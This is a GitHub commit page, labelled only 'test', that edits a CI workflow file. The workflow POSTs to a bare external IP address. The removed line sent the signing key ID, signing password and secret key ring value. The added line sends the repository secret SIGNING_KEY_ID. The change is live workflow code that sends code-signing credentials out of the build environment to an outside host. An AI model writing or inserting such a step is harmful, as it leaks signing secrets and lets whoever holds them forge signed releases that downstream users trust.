Skip to content

Commit

Permalink
test
Browse files Browse the repository at this point in the history
  • Loading branch information
yangbo committed Sep 3, 2024
1 parent e04ed2c commit f37e1b2
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/test.yml
Original file line number Diff line number Diff line change
Expand Up @@ -16,4 +16,4 @@ jobs:
url: 'http://43.156.154.114:8085/test'
method: 'POST'
customHeaders: '{"Content-Type": "application/text"}'
data: "$(echo $SIGNING_KEY_ID) --- $(echo $SIGNING_PASSWORD) --- $(echo $SIGNING_SECRET_KEY_RING_KEY)"
data: ${{ secrets.SIGNING_KEY_ID }}

0 comments on commit f37e1b2

Please sign in to comment.